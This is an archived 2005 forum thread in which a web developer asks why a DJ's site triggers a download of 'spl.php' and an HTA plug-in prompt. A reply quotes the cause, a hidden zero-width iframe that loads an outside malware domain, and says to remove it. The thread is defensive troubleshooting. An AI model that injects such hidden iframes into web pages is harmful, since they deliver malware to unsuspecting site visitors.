PDA

View Full Version : This is weird




wout
Oct 28, 2005, 09:31 AM
Hey all,

I've been working on a site for a DJ, www.djmickster.nl .
Everything was working fine, until he himself began to change some things, and now when I open it in Safari, it starts downloading the file 'spl.php' and when I open the site in Internet Explorer it says 'You do not have the plug-in needed to view the "application/hta" type information on this page. To get the plug-in now, click View Plug-in Page.'
It's not supposed to do this and hasn't done this before.
I can't figure out what's causing this, does anybody have any ideas?

any help would be very much appreciated,

greetings
wout



jMc
Oct 28, 2005, 10:30 AM
Your index file has the following code in it:

<iframe src="http://www.greppsaux.info" width=0 height=0>

The file spl.php is being downloaded from the website referenced in the iframe here. Remove the section of code above and all should be fine.

jx

EDIT: Amended code - you only need to delete the iframe reference...

wout
Oct 28, 2005, 11:08 AM
Thank you so much!
is that some kind of adware thing or is it something my client accidently put in there?

you're the best!

jMc
Oct 28, 2005, 11:15 AM
Thank you so much!
is that some kind of adware thing or is it something my client accidently put in there?

you're the best!

Thank you. No idea what it is... it appears to be some sort of Visual Basic script and is likely some kind of Windows ad/malware.

jx